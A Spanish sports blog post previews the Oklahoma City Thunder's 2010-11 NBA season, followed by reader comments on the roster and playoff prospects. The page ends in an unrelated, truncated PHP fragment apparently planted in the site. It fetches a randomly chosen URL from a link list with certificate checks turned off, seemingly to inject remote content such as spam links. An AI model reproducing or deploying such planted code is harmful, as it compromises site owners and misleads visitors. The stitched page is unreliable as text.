Oklahoma City Thunder 2010-2011: Parón biológico

30 de September de 2010 por TheDeerHunter

El azul de los Thunder está de moda. Son la revelación de la pasada campaña. El equipo con más futuro, comandado por la mega-estrella emergente. El potencial y la juventud de todos, técnico inclusive, es un activo incalculable.

Cuando el 30 de Abril, en el Ford Center, Pau Gasol conseguía el rebote ofensivo de su vida y los Lakers campeones se abrazaban de gozo por haber logrado doblegarles, el sentimiento fue de sorprendente decepción. Recordemos que estamos hablando de la peor franquicia en las dos temporadas anteriores, con 20 y 23 victorias respectivamente, que de la noche a la mañana había pasado a cuajar la temporada más brillante desde la época de Kemp y Payton, poniendo a Durant en las mismísimas quinielas para el MVP con el título de anotador bajo el brazo y muy cerca de lograr el mayor bombazo de la liga tras el año del “We Believe” de los Warriors sobre los Mavericks. Pero las caras de todos eran de decepción. Ellos se vieron con posibilidades reales de tumbar a los Lakers. Sólo la inexperiencia les impidió poner las cosas aún más al rojo vivo: La inmensa defensa de Sefolosha sobre Kobe más los interesantes sistemas de Scott Brooks, la electricidad de Westbrook machacando el hígado de Fisher,  la irrupción de Ibaka, de Harden y Durant… Siempre Durant. Y todavía hay gente que lo ha descubierto mundialmente. En ese momento sólo ellos sabían realmente lo buenos que eran. Bueno, junto a los Lakers, que no les quedó otra que aplicarse en aprenderlo, por la cuenta que les trajo.

Podrían haber caído en la autocomplacencia por un trabajo objetivamente bien hecho. El potencial, el futuro del que tanto se habla y que es la antesala de los fracasos y las “re-reconstrucciones”. Lo único cierto es que hay trenes que no vuelven a pasar. Que la oportunidad de haber forzado un partido más (y quién sabe) quizás no la vuelvan a tener nunca, como tampoco el haber dejado pasar este verano la posibilidad de captar la pieza maestra que hubiera convertido la actual plantilla en algo verdaderamente serio. Si aquello fue tanta decepción también lo debería de haber sido esto. En lugar de un Carlos Boozer, un Chris Bosh o un Amaré Stoudemire, las incorporaciones son un Morris Petterson en las últimas, Daequan Cook, Royal Ivey y el novato Cole Aldrich. No es previsible que el impacto de este joven pívot suponga un salto cualitativo sustancial, como tampoco ninguno de los otros fichajes. En principio todos ellos serán 2ª o 3ª rotación en cada una de sus posiciones. Reservas de reservas…

No podemos esperar que la progresión de Durant siga al mismo ritmo. Suponemos que mejorará en algunas facetas, pero también el resto de equipos tratarán de ponerse las pilas en su defensa. Westbrook, Harden, Ibaka y quizás Maynor evolucionarán. De ellos básicamente depende que los Thunder puedan superarse a sí mismos. Jeff Green sufrió un cierto estancamiento el año pasado, especialmente en playoffs. Parecido ocurrió con Krstic y mucho peor con Nick Collison. Si se lograra obtener un paso adelante de alguno de ellos el panorama mejoraría mucho. No será fácil. El fondo del armario termina en Dj White y BJ Mullens.

En definitiva, los Thunder tratarán de seguir en la cresta de la ola con las mismas armas del año pasado. Defensa intensa y velocidad a la contra. Con ellas y el grandísimo talento de sus jóvenes estrellas han logrado captar muchas simpatías. El objetivo es consolidar plaza de playoffs pero cada vez les resultará más difícil digerir una eliminación en primera ronda.

Quinteto titular: Russell Westbrook, Thabo Sefolosha, Kevin Durant, Jeff Green, Nenad Krstic.
6º hombre: James Harden.

Altas: Cole Aldrich, Daequan Cook, Royal Ivey, Morris Petterson
Bajas: Etan Thomas, Kyle Weaver, Mustafa Shakur, Kevin Ollie, Antonio Anderson

Pronóstico: Primera ronda.

Comenta

13 comentarios a esta entrada

  1. Rompe dice:
    #1

    Me encanta este equipo! Son jóvenes, con mucho potencial para crecer y no han perdido ninguna de sus piezas clave. Sí que parecía que este verano era la oportunidad para incorporar un gran nombre a la plantilla, viendo el espacio salarial con el que cuentan. Pero bueno, a pesar de la oportunidad perdida creo que sólo puede ir hacia arriba, y convertirse seriamente en la alternativa a los Lakers en el Oeste. Realmente no les veo inferiores a los Mavs, Jazz o Spurs. Darán que hablar, eso seguro.
    Gran análisis Deer 😉

      Citar

  2. rojorob dice:
    #2

      Citar

  3. sergio dice:
    #3

    Supongo que se puede esperar de Durant una mejora en el número de asistencias a poco que sepa encontrar a sus compañeros en los 2 contra 1. A Westbrook lo veo demasiado especializado en determinadas tareas para que se produzca una mejora sustancial en cualquier apartado. Harden debería compartir minutos con Sefolosha, especialmente si el equipo contrario no dispone de un jugador de perímetro determinante.

    Me gustará ver la progresión de Aldrich en el equipo. Un tipo físico que tampoco tiene demasiada competencia (Krstic no es Chamberlain) en su puesto. Al menos esperemos que baje balones e intimide en forma de punteos y tapones. Quizás sea un poco lento en el poste bajo…. pero nada que no pueda desarrollar ahora que es joven. ¿Un tapado del Draft? Para mi puede serlo…

    Por cierto… DJ White es un alta de este año? No lo enviaron a la D-League en marzo o asi…? Este tipo finalizando canastas al contragolpe es un espectaculo. Eso si, baloncestisticamente no le exijas muxo.

    Un quinteto Westbrook-Harden-Durant-Green-Aldrich tiene una media de 22 años y un futuro que asusta. Veamos si Scott esta preparado para darle un punto más a este equipo. Desde luego, el Oeste está más flojo este año. No me sorprendería una segunda ronda en PO

      Citar

  4. Txusma dice:
    #4

    Yo creo q deberían mejorar esa posición de 4 y dejar a Green para sexto hombre. Los 3’5 nunca han acabado de convencerme. De hecho hay pocos que realmente triunfen.

      Citar

  5. portu dice:
    #5

    Pero al juego de los Thunder les viene muy bien un tío rápido para la posición de 4, un 3,5 como tú decías Txus. Además desde el banco entran jugadores diferentes a los titulares: Westbrook/Maynor, Sefolosha/Harden, Green/Ibaka, Krstic/Aldrich/Mullens. Cuando se necesite un 4 más físico, un 4 verdadero Ibaka podrá tner más minutos, tienen bastantes opciones. Yo les veo en 2ª ronda, sobretodo pq tienen más equipo para ir mejorando en nº de victorias en regular season.

      Citar

  6. sayim dice:
    #6

    Estoy con Txus, un 3 y medio es el camino más corto hacia la indefinición. Para mi, los 3,5 si no tienen un Center dominante al lado enseñan más sus defectos que sus virtudes (si me parece muy adecuado un 3,5 con un center dominante estilo Howard-Lewis). No veo que tengan grandes posibilidades de mejora con una pareja interior titular formada por Green y Krstic, a ver en que acaba Ibaka como jugador…

    Aun a pesar de todo esto para mi son casi fijos en segunda ronda, en PO son un equipo muy incomodo para sus rivales

      Citar

  7. Viva_Dirk dice:
    #7

    Pero deben seguir teniendo hueco para el año que viene ¿no? Vamos que no he mirado quienes salen al mercado pero la franquicia parece bien dirigida desde los despachos y si no le han dado el máximo a Amare o Boozer sera que buscan no hipotecarse tanto.

    Aun no me he parado a mirar todas las plantillas, pero si que parecen fijos en play-offs.

      Citar

  8. Óscar dice:
    #8

    De Oklahoma City sólo cambiaría un par de cosas: su uniforme y logo (aunque son gustos), y la División en la que juegan, por aquello de ser rival de Portland…
    En los despachos, de lo mejor de la NBA, con Sam Presti y su mano derecha Rich Cho (ahora GM de los Blazers) a la cabeza. Un modelo de gestión y de planificación de un proyecto.
    En la cancha, qué decir de Scott Brooks y su trabajo la temporada pasada. Sólo una victoria más les habría librado de los Lakers en 1ª ronda y no se sabe hasta donde podrían haber llegado con el nivel que mostraron, sobre todo como locales.
    La plantlla no ha hecho más que mejorar. Se supone que mantendrán el mismo quinteto inicial Westbrook-Sefolosha-Durant-Green-Krstic, pero ojo con Cole Aldrich, que podría quitarle el puesto al serbio, si se lo gana. La rotación al final de campaña se quedó en 9 hombres, con Maynor y Harden por fuera e Ibaka y Collison por dentro. Podría pensarse que les falta otro “3” de garantías, más allá de DJ White (que no creo que vuelva a alternar por tercer año el roster y algunos minutos, con el equipo de la D-L), pero teniendo a Sefolosha, Green e incluso Morris Peterson no parece que tengan problemas.
    De los nuevos, si cambias a Kyle Weaver por Royal Ivey como especialista defensivo de perímetro, si añades a otro especialista de tiro como Daequan Cook y eliges a Aldrich en el draft dejando marchar a Etan Thomas, sin olvidar a Morris Peterson, sólo cabe pensar que la plantilla es aún mejor y encima con un coste moderado (sólo Sacramento y Minnesota gastarán menos en salarios en principio en toda la NBA).
    De los 15 en plantilla, sólo Mullens parece descartado para entrar en la rotación habitual, por lo que deberán definir los roles. La competencia será fuerte. Lo que más asusta es el margen de mejora que aún tienen y la media de edad.
    Lo dicho, un modelo a seguir, en los despachos y en la cancha.

      Citar

  9. Jabho dice:
    #9

    Pues yo le veo un techo alto a este equipo. Westbrook todavía debe mejorar bastante y Durant ya tiene nivel de top-5 de la liga. Hay un gran reparto de buenos jugadores como Harden, Sefolosa, Green,…. La clave es que su juego interior gane en dureza y consistencia y para eso apuesto por Ibaka-Aldrich.

    Ibaka es una bestia fisicamente y debe empezar de titular para mi gusto. Aldrich creo que va a ser un jugador de buena carrera en la NBA. Ambos deben ir ganando rol poco a poco.

    La clave está en ese juego interior. Si consiguen se duros dentro, por fuera son uno de los mejores equipos de la liga.

    Me sumo en cierta forma a la duda de si Green debe ser titular. Para competir con los grandes necesitas interiores grandes. Green puede ser un tremendo 6º hombre.

      Citar

  10. LEmontus dice:
    #10

    Quizás sea excesivo por que son jóvenes pero yo los veo 2º o 3º de conferencia ya el año pasado los veia del lo mejor del oeste y este año seguro que mejoran.

    Serán segundos o terceros si Ibaka termina de eplotar y le dan la oportunidad de hacerlo, si Hardem demuestra con números la clase que mostró elaño pasado y si no se lesionan los jugadores importantes.

      Citar

  11. kantonyo dice:
    #11

    Los Thunders son uno de los equipos más interesantes para seguir este año. Jugadores como Durant, Westbrook, Ibaka tienen un margen de mejora enorme.

    La adquisición de Cole Aldrich en el draft para mi opinión ha sido un gran acierto. Es justo lo que necesitaban: musculo y garra bajo los tableros. Además creo que es uno de los rookies más preparados para aportar desde el inicio de la temporada. Si consigue jugar 20-25 minutos puede llegar a promediar cerca de 10 puntos y 10 rebotes.

    Jeff Green fue sin duda la decepción del año pasado, por lo que yo me la jugaría con un juego interior: Ibaka-Aldrich, aunque depende mucho de en que estado físico lleguen los dos al inicio de temporada.

      Citar

  12. portu dice:
    #12

    Hombre, son muy buenos, pero lo son sobretodo gracias a K. Durant, q es un fuera de serie, uno de esos jugadores q salen cada 5 años o más… no creo q todo sea gracias a tanta planificación y gestión, hubiese bastado q Portland pillase a Durant en vez de Oden y el equipo sería otro… sin ir más lejos dejaron pasar a B. Lopez o pillaron a Harden antes q a Tyreke Evans o incluso Curry… buena gestión sí, no niego eso, algún movimiento como el de M. Peterson ha sido algo conservador, han arriesgado poco este verano, pero sobretodo destacan por tener a K. Durant q les va a poner donde Lebron puso a Cleveland o incluso más arriba.

      Citar

  13. Viva_Dirk dice:
    #13

    Mas arriba de lo que puso Lebron a los Cavs es el anillo y alguna temporada cercana a 70 victorias.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>